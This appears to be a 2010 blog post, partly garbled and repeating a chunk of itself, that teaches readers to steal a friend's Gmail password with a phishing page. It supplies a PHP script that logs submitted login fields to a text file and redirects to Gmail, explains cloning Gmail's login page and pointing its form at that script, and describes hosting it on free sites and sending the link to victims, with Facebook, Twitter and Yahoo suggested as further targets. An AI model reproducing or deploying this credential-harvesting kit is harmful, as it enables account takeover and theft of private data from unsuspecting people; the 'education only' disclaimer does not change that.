Friday, December 17, 2010

How to trace your friends gmail password

How to trace your friends gmail password

We will we use very popular method to h ack Gmail account password. I am going to tell how to make a  fake web page to get password of your friends by little bit fun This is one of the best method to hack gmail  password. This will work only if your friend don’t know about this method of getting  gmail password.

For this we need to create three files:
1. A fake gmail login page file
2. A php file
3. Text files to store password
Create your php file
1. Open notepad and copy this code:
header (“Location: https://gmail.com”);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($ handle, “rn”);
fclose($handle) ;
exit;
?>

2.Now save this as gmailphishing.php
Your php file is now created
If you Don’t understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt
Create gmail fake login page
Now  go to http://www.gmail.com and right click / View Source.Copy source in notepad and save it as gmaillogin.html .Now open source code of this html file
We need to find the place where Login  code in gmail page that where send the user after clicking on it.
Now Press crtl-f after opening source code and   search for this code
action=anything.
In this case we have this
We replace that part with:
2.Now save this as gmailphishing.php Your php file is now created If you Don’t understand what this php file is doing you need to learn some basic of php. This php file will save information of victim in file password.txt
Create gmail fake login page
Now  go to http://www.gmail.com and right click / View Source. Copy source in notepad and save it as gmaillogin.html .Now open source code of this html file
We need to find the place where Login  code in gmail page that where send the user after clicking on it. Now Press crtl-f after opening source code and   search for this code
action=anything.
In this case we have this

action=”https://www.google.com/accounts/ServiceLoginAuth?service=mail

and Now We replace that part with:

action=”gmailphishing.php

Save your gmailfake.html file
Text file
Create a blank text file and name it password.txt
Now upload all the threefiles gmailfake.html,gmailphishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake gmail login page by going to http://ursite.110mb.com/gmailfake.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is created,In which the password is stored
You can also use
Easy-share.com
Or just free.com
Or such a site which provides you to upload or any other free hosting
site.
Suppose you register with name gmailaccounthack.Your link will behttp://www.gmailaccounhack.justfree.com/ after uploading your file, you will see publish links. Those links could be as http://www.gmailaccount.justfree.com/fakegmail.html
now you have done, now sent this link to your friend, if they login to this page, their password will save at the server.
In this way you can use any server, you can get any password, you can make other fake pages like twitter or facebook or yahoo, just, create it like NEW VERSION or facebook try this.
NOTE:
Use this on your own responsibility, post is for education only.

No comments:

Post a Comment

Subscribe via email

Enter your email address:

Delivered by FeedBurner